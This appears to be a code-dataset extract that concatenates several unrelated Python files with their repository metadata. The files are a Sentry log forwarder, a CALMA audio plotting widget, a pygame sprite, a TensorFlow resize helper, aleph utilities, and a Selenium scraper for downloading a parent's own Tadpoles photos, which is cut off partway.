] | 15 | 2015-10-14T14:20:23.000Z | 2021-12-03T08:49:15.000Z | #!/usr/bin/env python
"""Standalone script for Sentry Logs"""
from __future__ import print_function
import os
import argparse
try:
from configparser import ConfigParser
except ImportError: # Python 2.7
from ConfigParser import ConfigParser # pylint: disable=import-error
# Ignore warnings caused by ``sentrylogs.<...>`` imports
# pylint: disable=no-name-in-module
def get_command_line_args():
    """CLI command line arguments handling"""
    parser = argparse.ArgumentParser(description='Send logs to Django Sentry.')
    # Option table: ((long flag, short flag), add_argument keyword arguments).
    options = [
        (('--sentryconfig', '-c'),
         dict(default=None,
              help='A configuration file (.ini, .yaml) of some '
                   'Sentry integration to extract the Sentry DSN from')),
        (('--sentrydsn', '-s'),
         dict(default="", help='The Sentry DSN string (overrides -c)')),
        (('--daemonize', '-d'),
         dict(default=False, action='store_const', const=True,
              help='Run this script in background')),
        (('--follow', '-f'),
         dict(default="all", help='Which logs to follow, default ALL')),
        (('--nginxerrorpath', '-n'),
         dict(default=None, help='Nginx error log path')),
        (('--loglevel', '-l'),
         dict(default=None, help='Minimum log level to send to sentry')),
    ]
    for flags, kwargs in options:
        parser.add_argument(*flags, **kwargs)
    return parser.parse_args()
def process_arguments(args):
    """Deal with arguments passed on the command line"""
    if args.sentryconfig:
        print('Parsing DSN from %s' % args.sentryconfig)
        os.environ['SENTRY_DSN'] = parse_sentry_configuration(args.sentryconfig)

    if args.sentrydsn:
        # An explicitly passed DSN overrides anything parsed from -c.
        print('Using the DSN %s' % args.sentrydsn)
        os.environ['SENTRY_DSN'] = args.sentrydsn

    if ('SENTRY_DSN' not in os.environ) or (not os.environ['SENTRY_DSN']):
        raise SystemExit('No Sentry DSN found!')

    if args.nginxerrorpath:
        print('Using the Nginx error log path %s' % args.nginxerrorpath)
        os.environ['NGINX_ERROR_PATH'] = args.nginxerrorpath

    if args.loglevel:
        print('Using the sentry log level %s' % args.loglevel)
        os.environ['SENTRY_LOG_LEVEL'] = args.loglevel

    # Imported late so the settings module reads the env vars set above.
    from ..conf import settings  # noqa: F401; pylint: disable=unused-import

    if args.daemonize:
        print('Running process in background')
        from ..daemonize import create_daemon
        create_daemon()
def parse_sentry_configuration(filename):
    """Parse Sentry DSN out of an application or Sentry configuration file"""
    extension = os.path.splitext(filename)[-1][1:].lower()

    if extension == 'py':  # Django, Flask, Bottle, ...
        raise SystemExit('Parsing configuration from pure Python (Django,'
                         'Flask, Bottle, etc.) not implemented yet.')
    if extension != 'ini':
        raise SystemExit('Configuration file type not supported for parsing: '
                         '%s' % extension)

    # .ini style configuration (Pyramid, Pylons).
    parsed = ConfigParser()
    parsed.read(filename)
    key = 'dsn'
    candidates = ['sentry', 'filter:raven']
    for name in candidates:
        if name not in parsed:
            continue
        print('- Using value from [{section}]:[{key}]'
              .format(section=name, key=key))
        try:
            return parsed[name][key]
        except KeyError:
            print('- Warning: Key "{key}" not found in section '
                  '[{section}]'.format(section=name, key=key))
    raise SystemExit('No DSN found in {file}. Tried sections [{sec_list}]'
                     .format(
                         file=filename,
                         sec_list='], ['.join(candidates),
                     ))
def launch_log_parsers():
    """Run all log file parsers that send entries to Sentry"""
    from ..parsers.nginx import Nginx
    # Each parser tails its log file and forwards entries; follow_tail blocks.
    for parser in [Nginx]:
        parser().follow_tail()
def main():
    """Main entry point of console script"""
    args = get_command_line_args()
    process_arguments(args)
    print('Start sending %s logs to Sentry' % args.follow)
    launch_log_parsers()  # blocks while tailing the configured log files


if __name__ == '__main__':
    main()
| 37.310345 | 81 | 0.606978 | 495 | 4,328 | 5.191919 | 0.333333 | 0.028016 | 0.039689 | 0.021012 | 0.022568 | 0.022568 | 0 | 0 | 0 | 0 | 0 | 0.002236 | 0.276802 | 4,328 | 115 | 82 | 37.634783 | 0.81885 | 0.124307 | 0 | 0.024691 | 0 | 0 | 0.2506 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061728 | false | 0 | 0.111111 | 0 | 0.197531 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41309aa7b95e9754a43f4174cd8bb81a323ae14b | 9,102 | py | Python | etreebrowser/graph.py | CameronJRAllan/eTree-Browser | 72601450eb8538f79511715c5793a8594bdcfc80 | [
"MIT"
] | 1 | 2019-07-19T20:03:00.000Z | 2019-07-19T20:03:00.000Z | etreebrowser/graph.py | CameronJRAllan/eTree-Browser | 72601450eb8538f79511715c5793a8594bdcfc80 | [
"MIT"
] | null | null | null | etreebrowser/graph.py | CameronJRAllan/eTree-Browser | 72601450eb8538f79511715c5793a8594bdcfc80 | [
"MIT"
] | null | null | null | from PyQt5 import QtWidgets, QtCore
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Cantarell']
import matplotlib.pyplot as plt
import matplotlib.patches as mpatch
import numpy as np
import operator
import matplotlib.patheffects as path_effects
class CalmaPlot(FigureCanvas):
"""
This class provides functionality for providing graphical representations of CALMA data.
"""
    def __init__(self, width, height, dpi, hasCalma, parent=None):
        """
        Constructs an instance of the CALMA graphing class.

        An instance of CalmaPlot inherits FigureCanvas, a MatPlotLib class for
        displaying plots in the context of a PyQt5 application. It generates a
        figure (upon which we may draw), as well as a canvas to place the
        figure upon.

        Parameters
        ----------
        width : int
            The width of the figure to be created.
            NOTE(review): currently unused — figsize is hard-coded to (2, 2);
            confirm whether width/height were meant to feed figsize.
        height : int
            The height of the figure to be created (currently unused, see above).
        dpi : int
            The dots-per-inch for the figure, typically 100.
        hasCalma : bool
            Whether CALMA data is available; selects the placeholder message.
        parent : QWidget, optional
            Parent widget for this canvas.
        """
        # Create Figure instance (which stores our plots)
        self.fig = Figure(figsize=(2, 2), dpi=dpi, edgecolor='blue')

        # Add an initial plot to our figure
        self.canvasGraph = self.fig.add_subplot(111)

        # Fetch colour map
        self.colourMap = self.get_colour_map()

        # Initialize figure canvas, which initializes an instance of QtWidget
        FigureCanvas.__init__(self, self.fig)
        self.setParent(parent)

        # Store reference to axes
        self.ax = self.fig.gca()

        # Hide tick labels to create default style
        self.ax.set_yticklabels([])
        self.ax.set_xticklabels([])

        # Add placeholder text (message depends on CALMA availability)
        if hasCalma:
            self.placeHolderText = self.fig.text(0.5, 0.65, 'Click on a performance track for CALMA data', horizontalalignment='center',
                                                 verticalalignment='center', fontsize=16)
        else:
            self.placeHolderText = self.fig.text(0.5, 0.65, 'No CALMA data available for this query', horizontalalignment='center',
                                                 verticalalignment='center',
                                                 fontsize=16)

        # Make background transparent
        self.fig.patch.set_alpha(1.0)

        # Resize with window
        FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        FigureCanvas.updateGeometry(self)
        self.setMinimumSize(self.size())
def get_segment_colour_map(self, features):
"""
Generates a colour map for segment features.
Parameters
----------
features : float[]
Features information.
Returns
----------
newColourMap : str[]
Colour map for each segment type.
"""
hashList = {'1' : 'Grey',
'2':'Red',
'3':'Green',
'4':'greenyellow',
'5':'Pink',
'6':'Orange',
'7':'goldenrod',
'8':'indianred',
'9':'peachpuff',
'10':'deepskyblue',
'11':'firebrick',
'12':'orchid',
'13': 'moccasin',
'14':'slateblue',
'15':'turquoise',
'16':'tomato',
'17':'darkmagenta',
'18':'olivedrab'}
return hashList
    def plot_calma_data(self, loudnessValues, features, duration, type, **kwargs):
        """
        Takes CALMA data for a single track as input, and creates a plot.
        Parameters
        ----------
        loudnessValues : float[]
            An array of loudness / amplitude values.
        features : float[]
            Features information as (time, label) pairs.
        duration : float
            The duration of the track.
        type : str
            Feature type, 'segment' or 'key'; selects the colour map.
            (Shadows the built-in `type` within this method.)
        **kwargs
            title : str, optional
                Text drawn over the plot in place of the placeholder.
            release : any, optional
                When present, the final redraw is skipped (redrawing here
                causes a crash with multiple plots).
        """
        # Replace colour map if needed
        if type == 'segment' : self.colourMap = self.get_segment_colour_map(features)
        if type == 'key' : self.colourMap = self.get_colour_map()
        # Hide placeholder text if visible; replace it with the title when one
        # is supplied. KeyError (no 'title') or ValueError (text already
        # removed) just blanks the placeholder instead.
        try:
            self.placeHolderText.remove()
            text = self.fig.text(0.5, 0.65, kwargs['title'], horizontalalignment='center',
                                 verticalalignment='center', fontsize=16)
            text.set_path_effects([path_effects.Stroke(linewidth=2, foreground='white'),
                                   path_effects.Normal()])
        except (KeyError, ValueError) as v:
            self.placeHolderText.set_text('')
        # Perform pre-processing
        nploudnessValues, duration, xSpaced, average = self.pre_processing(loudnessValues, duration)
        # Plot waveform (clearing any previous plot first)
        self.canvasGraph.axes.cla()
        self.canvasGraph.plot(xSpaced, nploudnessValues)
        for index, key in enumerate(features):
            # Calculate graph positions
            lx, ly, rec = self.calculate_graph_element_position(features, key, index, duration, average)
            # Add annotation to plot
            self.canvasGraph.annotate(key[1], (lx, ly), weight='bold', color='Black',
                                      fontsize=7, ha='center', va='center', rotation=270)
            self.ax.add_artist(rec)
        # Set axes labels
        self.ax.set_yticklabels([])
        self.ax.set_xlabel("Time (seconds)")
        # Add colour legend for keys (one patch per distinct label)
        keysAsSet = list(set([x[1] for x in features]))
        patches = []
        for k in keysAsSet:
            # Fall back to grey for labels absent from the colour map
            try:
                fc = self.colourMap[k]
            except KeyError as keyerr:
                fc = 'grey'
            patch = mpatch.Patch(color=fc, label=k)
            patches.append(patch)
        self.canvasGraph.legend(handles=patches, bbox_to_anchor=(1.00, 1), loc=2, borderaxespad=0, fontsize=7, ncol=2)
        self.fig.subplots_adjust(left=0.00, right=0.85, top=0.95)
        # Only redraw when 'release' was NOT passed.
        try:
            kwargs['release']
        except KeyError as v:
            # Causes crash with multiple plots
            self.finishDraw()
            self.fig.patch.set_alpha(1.0)
        return
    def calculate_graph_element_position(self, keyInfo, key, index, duration, average):
        """
        Calculates the position of the rectangular patch, relative to the event duration.
        Parameters
        ----------
        keyInfo : String[]
            The full list of (time, label) feature tuples.
        key : float[]
            The current (time, label) feature tuple.
        index : int
            Index in the keys we are processing.
        duration : float
            The duration of the track.
        average : float
            Average signal amplitude value of the track.
        Returns
        ----------
        lx : float
            The x position of the label.
        ly : float
            The y position of the label (the track's average amplitude).
        rec : matplotlib.patches.Rectangle
            A rectangular patch object. It is rotated 270 degrees, so its
            width/height are swapped relative to the drawn result.
        """
        # Rectangle takes (lowerleftpoint=(X, Y), width, height)
        xy = (float(key[0]), self.ax.get_ylim()[1])
        # If not the latest element in the key-change data
        if index < len(keyInfo) - 1:
            # Swap width and height as we are rotating 270 degrees
            height = keyInfo[index + 1][0] - keyInfo[index][0]
        else:
            # Last event: the patch extends to the end of the track.
            height = duration - keyInfo[index][0]
        width = self.ax.get_ylim()[1]
        angle = 270
        # Plot rectangle for key changes; unknown labels fall back to grey.
        try:
            fc = self.colourMap[key[1]]
        except KeyError as k:
            fc = 'grey'
        rec = mpatch.Rectangle(xy, width, height, angle=angle, alpha=0.5, fc=fc)
        # Calculate label positions (horizontal centre of the rotated patch)
        rx, ry = rec.get_xy()
        lx = rx + rec.get_height() / 2.0
        ly = average
        return lx, ly, rec
def get_colour_map(self):
"""
Returns a colour map for key changes to ensure consistent patterns across CALMA plots.
"""
try:
return {'C# minor' : 'Grey', 'A major' : 'Red', 'D minor' : 'Green',
'Eb Purple': 'greenyellow', 'D major' : 'Pink', 'G major' : 'Orange',
'G minor': 'goldenrod', 'A minor' : 'indianred', 'C minor' : 'peachpuff',
'B minor' : 'deepskyblue', 'Ab Major' : 'firebrick', 'Eb / D# minor' : 'orchid',
'Ab major' : 'moccasin', 'G# minor' : 'slateblue', 'Eb major' : 'turquoise',
'C major' : 'tomato', 'B major' : 'darkmagenta', 'F major' : 'olivedrab',
'F minor' : 'olive', 'Bb major' : 'lightsteelblue', 'Db major' : 'plum',
'Bb minor' : 'mediumspringgreen', 'E minor' : 'lightsalmon',
'F# / Gb major' : 'gold', 'F# minor' : 'burlywood'}
# If colour not found to match, return grey as a last resort
except KeyError as e:
print('Unmatched colour: {0}'.format(e))
return 'Grey'
def pre_processing(self, loudnessValues, duration):
# Clip
loudnessValues = loudnessValues[100:-50]
nploudnessValues = np.array(loudnessValues)
# Frame-rate is the number of values provided, divided by the duration
frame_rate = len(nploudnessValues) / duration
# Calculate average for placing labels on Y-AXIS
average = sum(loudnessValues) / len(loudnessValues)
# Generate linear spacing for seconds in X-AXIS
xSpaced = np.linspace(0, len(loudnessValues) / frame_rate, num=len(loudnessValues))
return nploudnessValues, duration, xSpaced, average
def finishDraw(self):
self.fig.canvas.draw_idle() | 33.340659 | 128 | 0.614041 | 1,082 | 9,102 | 5.114603 | 0.33549 | 0.013914 | 0.006505 | 0.010842 | 0.117094 | 0.112035 | 0.062161 | 0.028551 | 0.028551 | 0 | 0 | 0.017057 | 0.272138 | 9,102 | 273 | 129 | 33.340659 | 0.818264 | 0.285761 | 0 | 0.115385 | 0 | 0 | 0.133247 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.053846 | false | 0 | 0.069231 | 0 | 0.176923 | 0.007692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413328f9159158b7e73d6e4e594f24dbc66f5d32 | 358 | py | Python | scripts/speed.py | Maxence-Santos/space-invader | 4ac359f61ab673c816005d0d85567c3227ec06a1 | [
"MIT"
] | null | null | null | scripts/speed.py | Maxence-Santos/space-invader | 4ac359f61ab673c816005d0d85567c3227ec06a1 | [
"MIT"
] | null | null | null | scripts/speed.py | Maxence-Santos/space-invader | 4ac359f61ab673c816005d0d85567c3227ec06a1 | [
"MIT"
] | null | null | null | import pygame
import os
class Speed:
    """A speed power-up sprite drawn at a fixed vertical position."""

    def __init__(self, X):
        self.X = X
        self.Y = 700
        # Load the sprite once and scale it to the power-up's on-screen size.
        raw_sprite = pygame.image.load(os.path.join("img/speed_power_up.png"))
        self.image = pygame.transform.scale(raw_sprite, (55, 55))

    def update_and_draw(self, screen):
        """Blit the power-up sprite onto *screen* at its (X, Y) position."""
        screen.blit(self.image, (self.X, self.Y))
4133f8869dd2769312a3bb4f13caa9cc3c94d267 | 821 | py | Python | supermariopy/tfutils/image.py | theRealSuperMario/supermariopy | 9fff8275278ff26caff50da86109c25d276bb30b | [
"MIT"
] | 36 | 2019-07-14T16:10:37.000Z | 2022-03-29T10:11:03.000Z | supermariopy/tfutils/image.py | theRealSuperMario/supermariopy | 9fff8275278ff26caff50da86109c25d276bb30b | [
"MIT"
] | 3 | 2019-10-09T15:11:13.000Z | 2021-07-31T02:17:43.000Z | supermariopy/tfutils/image.py | theRealSuperMario/supermariopy | 9fff8275278ff26caff50da86109c25d276bb30b | [
"MIT"
] | 14 | 2019-08-29T14:11:54.000Z | 2022-03-06T13:41:56.000Z | import tensorflow as tf
def resize_bilinear(x, shape):
    """
    Resize `x` to `shape` using bilinear interpolation with align_corners,
    refusing to run on TensorFlow versions where the op is buggy.

    Parameters
    ----------
    x : tf.Tensor
        The tensor to resize.
    shape :
        Target spatial shape, passed through to tf.image.resize_bilinear.

    Raises
    ------
    NotImplementedError
        If the installed TensorFlow is older than 1.14.

    References
    ----------
    [1]: https://github.com/tensorflow/tensorflow/issues/6720
    [2]: https://github.com/tensorflow/tensorflow/issues/33691
    """
    # Only the first two version components matter; slicing avoids the
    # brittle 3-way unpack (e.g. "1.14" or "2.5.0-dev..." would break it).
    major_version, minor_version = tf.__version__.split(".")[:2]
    version = int(major_version) * 100 + int(minor_version)
    if version < 114:  # 1.14
        raise NotImplementedError(
            "Resize bilinear is buggy for tensorflow version below 1.14"
        )
    # From 1.14 onwards align_corners=True behaves correctly; the previous
    # 114<=v<115 and v>=115 branches returned the exact same call.
    return tf.image.resize_bilinear(x, shape, align_corners=True)
| 34.208333 | 76 | 0.665043 | 105 | 821 | 5.047619 | 0.466667 | 0.10566 | 0.084906 | 0.113208 | 0.335849 | 0.335849 | 0.184906 | 0.184906 | 0.184906 | 0.184906 | 0 | 0.054945 | 0.224117 | 821 | 23 | 77 | 35.695652 | 0.77708 | 0.270402 | 0 | 0.153846 | 0 | 0 | 0.10424 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41347176b216823b2850da2216f2fdd2a2569240 | 1,746 | py | Python | aleph/util.py | mcrouse911/findpeopleviadocument | fecb99a5c167dd281af324f8c862fda70021f081 | [
"MIT"
] | null | null | null | aleph/util.py | mcrouse911/findpeopleviadocument | fecb99a5c167dd281af324f8c862fda70021f081 | [
"MIT"
] | null | null | null | aleph/util.py | mcrouse911/findpeopleviadocument | fecb99a5c167dd281af324f8c862fda70021f081 | [
"MIT"
] | null | null | null | # coding: utf-8
import time
import random
import logging
from celery import Task
from banal import ensure_list
from normality import stringify
from pkg_resources import iter_entry_points
log = logging.getLogger(__name__)
EXTENSIONS = {}
def get_extensions(section):
    """Load and memoise the plugins registered under an entry-point section."""
    cache = EXTENSIONS.setdefault(section, {})
    if not cache:
        # First access for this section: resolve every entry point once.
        for entry_point in iter_entry_points(section):
            cache[entry_point.name] = entry_point.load()
    return list(cache.values())
def dict_list(data, *keys):
    """Return the first matching key's value from *data*, coerced to a list.

    Keys are tried in order (later keys act as fallbacks); an empty list is
    returned when none of them are present.
    """
    found = next((k for k in keys if k in data), None)
    if found is None:
        return []
    return ensure_list(data[found])
def backoff(failures=0):
    """Sleep for an exponentially growing, jittered interval.

    The exponent is capped at 7 plus random jitter, i.e. at most roughly
    128-256 seconds.
    """
    capped = min(7, failures)
    duration = 2 ** (capped + random.random())
    log.debug("Back-off: %.2fs", duration)
    time.sleep(duration)
def html_link(text, link):
    """Render *text* as an HTML reference, hyperlinked when *link* is given.

    Empty or None text falls back to the placeholder '[untitled]'; when no
    link is supplied a plain <span> is produced instead of an anchor.
    """
    label = text if text else '[untitled]'
    if link is None:
        return "<span class='reference'>{}</span>".format(label)
    return "<a class='reference' href='{}'>{}</a>".format(link, label)
def anonymize_email(name, email):
    """Build a display label from a user's name and a masked e-mail address.

    All but the first character of the mailbox part are replaced with '*'.
    Returns just the name when no e-mail is given, just the masked e-mail
    when no name is given, otherwise 'name <masked-email>'.
    """
    name = stringify(name)
    email = stringify(email)
    if email is None:
        return name
    if '@' in email:
        # Split on the LAST '@' so odd mailbox parts are handled.
        mailbox, _, domain = email.rpartition('@')
        if mailbox:
            mailbox = mailbox[0] + '*' * (len(mailbox) - 1)
        email = '{}@{}'.format(mailbox, domain)
    if name is None:
        return email
    return '{} <{}>'.format(name, email)
class SessionTask(Task):
    """Celery task base class that discards the SQLAlchemy session on failure."""
    def on_failure(self, exc, task_id, args, kwargs, einfo):
        # Drop the (possibly broken) scoped session so the next task on this
        # worker starts fresh. The import is deferred to avoid a circular
        # import with aleph.core.
        from aleph.core import db
        db.session.remove()
| 26.059701 | 73 | 0.623711 | 237 | 1,746 | 4.523207 | 0.413502 | 0.079291 | 0.033582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006121 | 0.251432 | 1,746 | 66 | 74 | 26.454545 | 0.814078 | 0.079038 | 0 | 0 | 0 | 0 | 0.068879 | 0.016907 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122449 | false | 0 | 0.163265 | 0 | 0.469388 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4136db303bfc69cac0328040053f475ee2387084 | 20,461 | py | Python | tadpole-catcher.py | tandalesc/tadpole-catcher | 5c5a7fce892aeb6f4c237ff14843fb325032b3bf | [
"BSD-3-Clause"
] | null | null | null | tadpole-catcher.py | tandalesc/tadpole-catcher | 5c5a7fce892aeb6f4c237ff14843fb325032b3bf | [
"BSD-3-Clause"
] | null | null | null | tadpole-catcher.py | tandalesc/tadpole-catcher | 5c5a7fce892aeb6f4c237ff14843fb325032b3bf | [
"BSD-3-Clause"
] | null | null | null | """This module downloads all photos/videos from tadpole to a local folder."""
import os
from os.path import abspath, dirname, join, isfile, isdir
import re
import sys
import json
import time
import pickle
import logging
import logging.config
from random import randrange
from getpass import getpass
from configparser import ConfigParser
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException
import requests
class DownloadError(Exception):
    """Raised when downloading a photo, video, or report fails."""
    # The docstring is the class body; the previous trailing `pass` was
    # redundant.
class Image(object):
    """A photo/video item scraped from the Tadpoles timeline.

    Wraps a selenium div whose inline style contains the media URL, deriving
    the download URL, a shortened id, the (optional) day-of-month, and the
    download key from it.
    """
    # Captures the URL embedded in the div's style attribute, i.e. the text
    # between '("' and the closing '"'.
    url_re = re.compile('\\("([^"]+)')
    url_search = lambda div: Image.url_re.search(div.get_attribute("style"))
    def __init__(self, div, date=None):
        self.div = div
        # Extract URL from div
        _url = Image.url_search(div).group(1)
        _url = _url.replace('thumbnail=true', '')
        # NOTE(review): the line below can never match - the previous call
        # already removed every 'thumbnail=true' substring, leaving a
        # dangling '&' or '?' separator in the URL. Confirm whether
        # '&thumbnail=true' should have been stripped first.
        _url = _url.replace('&thumbnail=true', '')
        self.url = 'https://www.tadpoles.com' + _url
        # Extract id from div
        # Shorten _id to avoid OS file length limit
        # TODO more robust id algorithm
        _id = div.get_attribute('id').split('-')[1]
        # Keep only the second half of the raw id.
        _id = _id[int(len(_id)/2):]
        self.id = _id
        # Save date (defaults to None)
        self.date = date
        # Get key (for downloading)
        _, self.key = self.url.split("key=")
    @property
    def date_text(self):
        # Zero-padded day-of-month; defaults to '01' when no date was set.
        return "{:02d}".format(self.date if self.date is not None else 1)
class Report(object):
    """A daily-report tile scraped from the Tadpoles timeline.

    Attributes:
        div: the source selenium element.
        display_text: the tile's visible text.
        date_text: zero-padded day-of-month parsed from the second text
            line, which is expected to look like 'mm/dd'.
    """
    def __init__(self, div):
        self.div = div
        self.display_text = div.get_attribute('outerText')
        # The second line of the tile text carries the date as mm/dd;
        # keep just the day, zero-padded to two digits.
        lines = self.display_text.split('\n')
        day = int(lines[1].split('/')[1])
        self.date_text = "{:02d}".format(day)
class Client:
    """The main client class responsible for downloading pictures/videos"""
    # Selenium cookies are pickled here between runs.
    COOKIE_FILE = "cookies.pkl"
    ROOT_URL = "http://www.tadpoles.com/parents"
    HOME_URL = "https://www.tadpoles.com/parents"
    CONFIG_FILE_NAME = "conf.json"
    # Default bounds (seconds) for the randomised anti-hammering sleep.
    MIN_SLEEP = 1
    MAX_SLEEP = 3
    # Month abbreviations as shown on the Tadpoles dashboard tiles.
    MONTHS = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']
    def __init__(self, config, download_reports=True):
        """Initialise the client.

        Parameters
        ----------
        config : configparser.ConfigParser
            Parsed settings with AUTHENTICATION and DOWNLOADS sections.
        download_reports : bool
            Whether daily reports are included alongside photos/videos.
        """
        self.init_logging()
        self.browser = None
        self.cookies = None
        self.req_cookies = None
        self.__current_month__ = None
        self.__current_year__ = None
        # NOTE(review): current_child appears unused elsewhere; the index
        # actually used is current_child_ind, set in download_images().
        self.current_child = None
        self.download_reports = download_reports
        self.config = config
        # e.g. {'jan':'01', 'feb':'02', ...}
        self.month_lookup = {month: "{:02d}".format(Client.MONTHS.index(month)+1) for month in Client.MONTHS}
def config_login_info(self):
return self.config['AUTHENTICATION']
def config_requests_info(self):
return self.config['DOWNLOADS']
    def init_logging(self):
        """Set up logging: DEBUG to the console, INFO to logs/tadpole.log."""
        # Create logging dir
        directory = dirname('logs/')
        if not isdir(directory):
            os.makedirs(directory)
        logging_config = dict(
            version=1,
            formatters={
                'f': {
                    'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'}
            },
            handlers={
                # 'h': console handler, verbose (DEBUG)
                'h': {
                    'class': 'logging.StreamHandler',
                    'formatter': 'f',
                    'level': logging.DEBUG
                },
                # 'f': file handler, quieter (INFO)
                'f': {
                    'class': 'logging.FileHandler',
                    'formatter': 'f',
                    'filename': 'logs/tadpole.log',
                    'level': logging.INFO}
            },
            root={
                'handlers': ['h', 'f'],
                'level': logging.DEBUG,
            },
        )
        logging.config.dictConfig(logging_config)
        self.logger = logging.getLogger('tadpole-catcher')
    def __enter__(self):
        """Context-manager entry: launch a Chrome WebDriver session."""
        self.logger.info("Starting browser")
        self.browser = webdriver.Chrome()
        # Poll up to 10s for elements to appear before selenium gives up.
        self.browser.implicitly_wait(10)
        self.logger.info("Got a browser")
        return self
    def __exit__(self, *args):
        """Context-manager exit: always quit the browser, even on error."""
        self.logger.info("Shutting down browser")
        self.browser.quit()
def sleep(self, minsleep=None, maxsleep=None):
"""Sleep a random amount of time bound by the min and max value"""
_min = minsleep or self.MIN_SLEEP
_max = maxsleep or self.MAX_SLEEP
duration = randrange(_min * 100, _max * 100) / 100.0
self.logger.info('Sleeping %r', duration)
time.sleep(duration)
def navigate_url(self, url):
"""Force the browser to go a url"""
self.logger.info("Navigating to %r", url)
self.browser.get(url)
def load_cookies(self):
"""Load cookies from a previously saved ones"""
self.logger.info("Loading cookies.")
with open(self.COOKIE_FILE, "rb") as file:
self.cookies = pickle.load(file)
    def dump_cookies(self):
        """Snapshot the browser's cookies in memory and pickle them to COOKIE_FILE."""
        self.logger.info("Dumping cookies.")
        self.cookies = self.browser.get_cookies()
        # NOTE(review): get_cookies() is called a second time here instead of
        # reusing self.cookies - confirm this duplication is intentional.
        with open(self.COOKIE_FILE, "wb") as file:
            pickle.dump(self.browser.get_cookies(), file)
    def add_cookies_to_browser(self):
        """Install previously loaded cookies whose domain matches the current URL."""
        self.logger.info("Adding the cookies to the browser.")
        for cookie in self.cookies:
            # Only add cookies whose domain suffix-matches the current URL;
            # WebDriver rejects cookies set for other domains.
            if self.browser.current_url.strip('/').endswith(cookie['domain']):
                self.browser.add_cookie(cookie)
def requestify_cookies(self):
"""Transform the cookies to what the request lib requires."""
self.logger.info("Transforming the cookies for requests lib.")
self.req_cookies = {}
for s_cookie in self.cookies:
self.req_cookies[s_cookie["name"]] = s_cookie["value"]
    def switch_windows(self):
        '''Switch WebDriver focus to the other open window.

        Assumes exactly two windows are open; with more than two, an
        arbitrary other window is chosen (set difference is unordered).
        '''
        self.logger.info("Switching windows.")
        all_windows = set(self.browser.window_handles)
        current_window = set([self.browser.current_window_handle])
        other_window = (all_windows - current_window).pop()
        self.browser.switch_to.window(other_window)
def get_current_child(self):
return self.get_children_params()[self.current_child_ind]
def get_child_name(self):
display_name = self.get_current_child()['display_name']
return display_name.split(' ')[0]
def get_num_children(self):
return len(self.get_children_params())
def get_children_params(self):
#tadpoles does not provide the children attribute if there is only one child
if 'children' in self.app_params:
return self.app_params['children']
else:
#if there is only one child, provide default parameters
return [{'display_name': 'child'}]
def has_next_child(self):
return self.current_child_ind+1 < self.get_num_children()
# add 1 to current child index, and reset to 0 if too many
def next_child(self):
if self.has_next_child():
self.current_child_ind+=1
else:
self.current_child_ind=0
def do_login(self):
"""Perform login to tadpole (without Google SSO)"""
self.logger.info("Navigating to login page.")
self.browser.find_element_by_id("login-button").click()
self.browser.find_element_by_class_name("tp-block-half").click()
self.browser.find_element_by_class_name("other-login-button").click()
# Get email, password, and submit elements
form = self.browser.find_element_by_class_name("form-horizontal")
email_form = self.find_by_xpath('//input[@type="text"]', 'Email field', form)
pwd_form = self.find_by_xpath('//input[@type="password"]', 'Password field', form)
submit = self.find_by_xpath('//button[@type="submit"]', 'Submit button', form)
# Fill out info and submit
email = self.config_login_info()['username']
pwd = self.config_login_info()['password']
if email is '' or pwd is '':
self.logger.info("'settings.ini' does not contain authentication information. Falling back to user-inputted values.")
email = input("Enter email: ")
pwd = input("Enter password: ")
email_form.send_keys(email)
pwd_form.send_keys(pwd)
self.logger.info("Clicking 'submit' button.")
submit.click()
self.logger.info("Sleeping 2 seconds.")
self.sleep(minsleep=2)
    def iter_monthyear(self):
        '''Yield the month tile element for each year/month on the home page.

        Each iteration navigates home (clicking a tile leaves the page),
        locates the next month/year tile pair by index, and stashes both on
        self.__current_month__/__current_year__ for filename construction.
        Iteration effectively ends when find_by_xpath fails to locate another
        tile (it calls sys.exit).
        '''
        month_xpath_tmpl = '//*[@id="app"]/div[3]/div[1]/ul/li[%d]/div/div/div/div/span[%d]'
        month_index = 1
        while True:
            # span[1] is the month label, span[2] the year label.
            month_xpath = month_xpath_tmpl % (month_index, 1)
            year_xpath = month_xpath_tmpl % (month_index, 2)
            # Go home if not there already.
            if self.browser.current_url != self.HOME_URL:
                self.navigate_url(self.HOME_URL)
            # Find the next month and year elements.
            month = self.find_by_xpath(month_xpath, "any more months")
